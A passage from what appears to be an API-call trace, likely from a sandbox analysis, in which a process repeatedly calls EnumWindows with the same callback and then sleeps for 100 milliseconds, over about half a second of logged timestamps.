(lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.156] Sleep (dwMilliseconds=0x64) [0129.157] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.157] Sleep (dwMilliseconds=0x64) [0129.158] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.159] Sleep (dwMilliseconds=0x64) [0129.160] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.160] Sleep (dwMilliseconds=0x64) [0129.162] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.162] Sleep (dwMilliseconds=0x64) [0129.166] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.166] Sleep (dwMilliseconds=0x64) [0129.167] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.168] Sleep (dwMilliseconds=0x64) [0129.169] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.169] Sleep (dwMilliseconds=0x64) [0129.171] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.171] Sleep (dwMilliseconds=0x64) [0129.172] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.173] Sleep (dwMilliseconds=0x64) [0129.174] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.174] Sleep (dwMilliseconds=0x64) [0129.176] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.176] Sleep (dwMilliseconds=0x64) [0129.177] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.177] Sleep (dwMilliseconds=0x64) [0129.179] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.179] Sleep (dwMilliseconds=0x64) [0129.180] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.181] Sleep (dwMilliseconds=0x64) [0129.182] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.182] Sleep (dwMilliseconds=0x64) [0129.184] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.185] Sleep (dwMilliseconds=0x64) [0129.186] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.186] Sleep (dwMilliseconds=0x64) [0129.187] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.187] Sleep (dwMilliseconds=0x64) [0129.189] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.189] Sleep (dwMilliseconds=0x64) [0129.192] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.192] Sleep (dwMilliseconds=0x64) [0129.193] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.194] Sleep (dwMilliseconds=0x64) [0129.195] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.195] Sleep (dwMilliseconds=0x64) [0129.196] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.197] Sleep (dwMilliseconds=0x64) [0129.198] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.198] Sleep (dwMilliseconds=0x64) [0129.199] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.200] Sleep (dwMilliseconds=0x64) [0129.201] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.201] Sleep (dwMilliseconds=0x64) [0129.203] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.203] Sleep (dwMilliseconds=0x64) [0129.204] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.205] Sleep (dwMilliseconds=0x64) [0129.206] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.206] Sleep (dwMilliseconds=0x64) [0129.207] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.208] Sleep (dwMilliseconds=0x64) [0129.209] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.209] Sleep (dwMilliseconds=0x64) [0129.210] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.211] Sleep (dwMilliseconds=0x64) [0129.212] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.212] Sleep (dwMilliseconds=0x64) [0129.214] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.214] Sleep (dwMilliseconds=0x64) [0129.215] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.216] Sleep (dwMilliseconds=0x64) [0129.217] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.217] Sleep (dwMilliseconds=0x64) [0129.221] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.221] Sleep (dwMilliseconds=0x64) [0129.223] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.223] Sleep (dwMilliseconds=0x64) [0129.224] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.225] Sleep (dwMilliseconds=0x64) [0129.226] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.226] Sleep (dwMilliseconds=0x64) [0129.227] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.228] Sleep (dwMilliseconds=0x64) [0129.229] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.229] Sleep (dwMilliseconds=0x64) [0129.230] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.230] Sleep (dwMilliseconds=0x64) [0129.232] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.232] Sleep (dwMilliseconds=0x64) [0129.235] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.235] Sleep (dwMilliseconds=0x64) [0129.237] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.237] Sleep (dwMilliseconds=0x64) [0129.238] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.238] Sleep (dwMilliseconds=0x64) [0129.240] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.240] Sleep (dwMilliseconds=0x64) [0129.241] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.241] Sleep (dwMilliseconds=0x64) [0129.243] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.243] Sleep (dwMilliseconds=0x64) [0129.244] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.245] Sleep (dwMilliseconds=0x64) [0129.246] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.246] Sleep (dwMilliseconds=0x64) [0129.249] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.249] Sleep (dwMilliseconds=0x64) [0129.251] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.251] Sleep (dwMilliseconds=0x64) [0129.252] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.252] Sleep (dwMilliseconds=0x64) [0129.254] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.254] Sleep (dwMilliseconds=0x64) [0129.256] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.256] Sleep (dwMilliseconds=0x64) [0129.257] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.258] Sleep (dwMilliseconds=0x64) [0129.259] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.259] Sleep (dwMilliseconds=0x64) [0129.260] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.261] Sleep (dwMilliseconds=0x64) [0129.262] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.262] Sleep (dwMilliseconds=0x64) [0129.263] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.264] Sleep (dwMilliseconds=0x64) [0129.265] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.265] Sleep (dwMilliseconds=0x64) [0129.267] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.267] Sleep (dwMilliseconds=0x64) [0129.268] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.269] Sleep (dwMilliseconds=0x64) [0129.270] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.270] Sleep (dwMilliseconds=0x64) [0129.271] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.272] Sleep (dwMilliseconds=0x64) [0129.273] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.273] Sleep (dwMilliseconds=0x64) [0129.274] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.275] Sleep (dwMilliseconds=0x64) [0129.276] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.276] Sleep (dwMilliseconds=0x64) [0129.280] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.281] Sleep (dwMilliseconds=0x64) [0129.282] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.282] Sleep (dwMilliseconds=0x64) [0129.284] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.284] Sleep (dwMilliseconds=0x64) [0129.286] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.286] Sleep (dwMilliseconds=0x64) [0129.287] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.288] Sleep (dwMilliseconds=0x64) [0129.289] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.289] Sleep (dwMilliseconds=0x64) [0129.290] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.291] Sleep (dwMilliseconds=0x64) [0129.292] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.292] Sleep (dwMilliseconds=0x64) [0129.294] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.294] Sleep (dwMilliseconds=0x64) [0129.296] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.296] Sleep (dwMilliseconds=0x64) [0129.298] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.298] Sleep (dwMilliseconds=0x64) [0129.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.300] Sleep (dwMilliseconds=0x64) [0129.302] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.302] Sleep (dwMilliseconds=0x64) [0129.303] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.303] Sleep (dwMilliseconds=0x64) [0129.305] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.305] Sleep (dwMilliseconds=0x64) [0129.307] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.307] Sleep (dwMilliseconds=0x64) [0129.312] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.312] Sleep (dwMilliseconds=0x64) [0129.314] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.314] Sleep (dwMilliseconds=0x64) [0129.316] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.316] Sleep (dwMilliseconds=0x64) [0129.317] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.317] Sleep (dwMilliseconds=0x64) [0129.319] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.319] Sleep (dwMilliseconds=0x64) [0129.321] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.321] Sleep (dwMilliseconds=0x64) [0129.322] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.323] Sleep (dwMilliseconds=0x64) [0129.324] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.325] Sleep (dwMilliseconds=0x64) [0129.326] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.327] Sleep (dwMilliseconds=0x64) [0129.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.328] Sleep (dwMilliseconds=0x64) [0129.330] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.330] Sleep (dwMilliseconds=0x64) [0129.332] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.332] Sleep (dwMilliseconds=0x64) [0129.334] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.334] Sleep (dwMilliseconds=0x64) [0129.335] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.336] Sleep (dwMilliseconds=0x64) [0129.337] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.338] Sleep (dwMilliseconds=0x64) [0129.339] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.339] Sleep (dwMilliseconds=0x64) [0129.344] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.344] Sleep (dwMilliseconds=0x64) [0129.347] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.347] Sleep (dwMilliseconds=0x64) [0129.348] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.349] Sleep (dwMilliseconds=0x64) [0129.350] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.350] Sleep (dwMilliseconds=0x64) [0129.352] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.352] Sleep (dwMilliseconds=0x64) [0129.354] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.354] Sleep (dwMilliseconds=0x64) [0129.355] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.355] Sleep (dwMilliseconds=0x64) [0129.357] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.357] Sleep (dwMilliseconds=0x64) [0129.358] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.359] Sleep (dwMilliseconds=0x64) [0129.361] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.362] Sleep (dwMilliseconds=0x64) [0129.363] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.364] Sleep (dwMilliseconds=0x64) [0129.365] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.365] Sleep (dwMilliseconds=0x64) [0129.366] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.366] Sleep (dwMilliseconds=0x64) [0129.368] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.368] Sleep (dwMilliseconds=0x64) [0129.369] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.369] Sleep (dwMilliseconds=0x64) [0129.371] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.371] Sleep (dwMilliseconds=0x64) [0129.440] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.440] Sleep (dwMilliseconds=0x64) [0129.441] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.441] Sleep (dwMilliseconds=0x64) [0129.445] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.445] Sleep (dwMilliseconds=0x64) [0129.448] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.448] Sleep (dwMilliseconds=0x64) [0129.449] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.450] Sleep (dwMilliseconds=0x64) [0129.451] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.451] Sleep (dwMilliseconds=0x64) [0129.453] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.453] Sleep (dwMilliseconds=0x64) [0129.454] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.454] Sleep (dwMilliseconds=0x64) [0129.456] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.457] Sleep (dwMilliseconds=0x64) [0129.458] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.458] Sleep (dwMilliseconds=0x64) [0129.460] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.460] Sleep (dwMilliseconds=0x64) [0129.462] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.462] Sleep (dwMilliseconds=0x64) [0129.463] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.463] Sleep (dwMilliseconds=0x64) [0129.465] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.465] Sleep (dwMilliseconds=0x64) [0129.466] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.467] Sleep (dwMilliseconds=0x64) [0129.468] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.469] Sleep (dwMilliseconds=0x64) [0129.470] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.471] Sleep (dwMilliseconds=0x64) [0129.472] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.472] Sleep (dwMilliseconds=0x64) [0129.473] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.473] Sleep (dwMilliseconds=0x64) [0129.475] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.475] Sleep (dwMilliseconds=0x64) [0129.476] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.476] Sleep (dwMilliseconds=0x64) [0129.478] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.478] Sleep (dwMilliseconds=0x64) [0129.482] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.482] Sleep (dwMilliseconds=0x64) [0129.484] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.484] Sleep (dwMilliseconds=0x64) [0129.485] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.485] Sleep (dwMilliseconds=0x64) [0129.487] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.487] Sleep (dwMilliseconds=0x64) [0129.488] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.488] Sleep (dwMilliseconds=0x64) [0129.490] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.490] Sleep (dwMilliseconds=0x64) [0129.491] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.491] Sleep (dwMilliseconds=0x64) [0129.493] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.493] Sleep (dwMilliseconds=0x64) [0129.494] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.494] Sleep (dwMilliseconds=0x64) [0129.496] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.496] Sleep (dwMilliseconds=0x64) [0129.497] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.497] Sleep (dwMilliseconds=0x64) [0129.499] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.499] Sleep (dwMilliseconds=0x64) [0129.500] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.500] Sleep (dwMilliseconds=0x64) [0129.502] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.502] Sleep (dwMilliseconds=0x64) [0129.504] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.504] Sleep (dwMilliseconds=0x64) [0129.505] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.506] Sleep (dwMilliseconds=0x64) [0129.507] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.507] Sleep (dwMilliseconds=0x64) [0129.509] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.509] Sleep (dwMilliseconds=0x64) [0129.511] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.511] Sleep (dwMilliseconds=0x64) [0129.513] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.513] Sleep (dwMilliseconds=0x64) [0129.515] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.515] Sleep (dwMilliseconds=0x64) [0129.518] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.518] Sleep (dwMilliseconds=0x64) [0129.520] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.520] Sleep (dwMilliseconds=0x64) [0129.522] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.522] Sleep (dwMilliseconds=0x64) [0129.523] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.524] Sleep (dwMilliseconds=0x64) [0129.525] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.525] Sleep (dwMilliseconds=0x64) [0129.527] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.527] Sleep (dwMilliseconds=0x64) [0129.529] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.529] Sleep (dwMilliseconds=0x64) [0129.531] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.531] Sleep (dwMilliseconds=0x64) [0129.533] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.533] Sleep (dwMilliseconds=0x64) [0129.534] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.534] Sleep (dwMilliseconds=0x64) [0129.536] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.536] Sleep (dwMilliseconds=0x64) [0129.537] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.538] Sleep (dwMilliseconds=0x64) [0129.539] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.539] Sleep (dwMilliseconds=0x64) [0129.541] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.541] Sleep (dwMilliseconds=0x64) [0129.542] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.543] Sleep (dwMilliseconds=0x64) [0129.544] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.544] Sleep (dwMilliseconds=0x64) [0129.545] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.545] Sleep (dwMilliseconds=0x64) [0129.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.548] Sleep (dwMilliseconds=0x64) [0129.549] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.549] Sleep (dwMilliseconds=0x64) [0129.551] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.551] Sleep (dwMilliseconds=0x64) [0129.553] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.553] Sleep (dwMilliseconds=0x64) [0129.554] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.554] Sleep (dwMilliseconds=0x64) [0129.556] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.556] Sleep (dwMilliseconds=0x64) [0129.561] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.561] Sleep (dwMilliseconds=0x64) [0129.563] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.563] Sleep (dwMilliseconds=0x64) [0129.564] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.564] Sleep (dwMilliseconds=0x64) [0129.566] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.566] Sleep (dwMilliseconds=0x64) [0129.568] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.568] Sleep (dwMilliseconds=0x64) [0129.570] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.570] Sleep (dwMilliseconds=0x64) [0129.571] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.571] Sleep (dwMilliseconds=0x64) [0129.573] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.573] Sleep (dwMilliseconds=0x64) [0129.575] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.575] Sleep (dwMilliseconds=0x64) [0129.583] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.583] Sleep (dwMilliseconds=0x64) [0129.585] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.585] Sleep (dwMilliseconds=0x64) [0129.586] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.586] Sleep (dwMilliseconds=0x64) [0129.588] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.589] Sleep (dwMilliseconds=0x64) [0129.590] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.590] Sleep (dwMilliseconds=0x64) [0129.592] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.592] Sleep (dwMilliseconds=0x64) [0129.594] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.594] Sleep (dwMilliseconds=0x64) [0129.595] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.595] Sleep (dwMilliseconds=0x64) [0129.599] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.599] Sleep (dwMilliseconds=0x64) [0129.600] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.600] Sleep (dwMilliseconds=0x64) [0129.602] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.602] Sleep (dwMilliseconds=0x64) [0129.603] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.603] Sleep (dwMilliseconds=0x64) [0129.605] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.605] Sleep (dwMilliseconds=0x64) [0129.606] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.606] Sleep (dwMilliseconds=0x64) [0129.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.608] Sleep (dwMilliseconds=0x64) [0129.609] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.609] Sleep (dwMilliseconds=0x64) [0129.611] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.611] Sleep (dwMilliseconds=0x64) [0129.612] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.612] Sleep (dwMilliseconds=0x64) [0129.614] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.614] Sleep (dwMilliseconds=0x64) [0129.615] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.616] Sleep (dwMilliseconds=0x64) [0129.617] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.617] Sleep (dwMilliseconds=0x64) [0129.619] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.619] Sleep (dwMilliseconds=0x64) [0129.620] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.620] Sleep (dwMilliseconds=0x64) [0129.622] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.622] Sleep (dwMilliseconds=0x64) [0129.623] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.623] Sleep (dwMilliseconds=0x64) [0129.625] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.625] Sleep (dwMilliseconds=0x64) [0129.626] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.626] Sleep (dwMilliseconds=0x64) [0129.628] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.628] Sleep (dwMilliseconds=0x64) [0129.630] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.630] Sleep (dwMilliseconds=0x64) [0129.631] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.632] Sleep (dwMilliseconds=0x64) [0129.633] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.634] Sleep (dwMilliseconds=0x64) [0129.635] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.636] Sleep (dwMilliseconds=0x64) [0129.640] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.640] Sleep (dwMilliseconds=0x64) [0129.641] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.641] Sleep (dwMilliseconds=0x64) [0129.643] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.643] Sleep (dwMilliseconds=0x64) [0129.644] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.644] Sleep (dwMilliseconds=0x64) [0129.646] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.646] Sleep (dwMilliseconds=0x64) [0129.648] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.649] Sleep (dwMilliseconds=0x64) [0129.650] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.650] Sleep (dwMilliseconds=0x64) [0129.652] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.652] Sleep (dwMilliseconds=0x64) [0129.655] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.655] Sleep (dwMilliseconds=0x64) [0129.659] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.659] Sleep (dwMilliseconds=0x64) [0129.660] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.660] Sleep (dwMilliseconds=0x64) [0129.662] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.662] Sleep (dwMilliseconds=0x64) [0129.664] EnumWindows 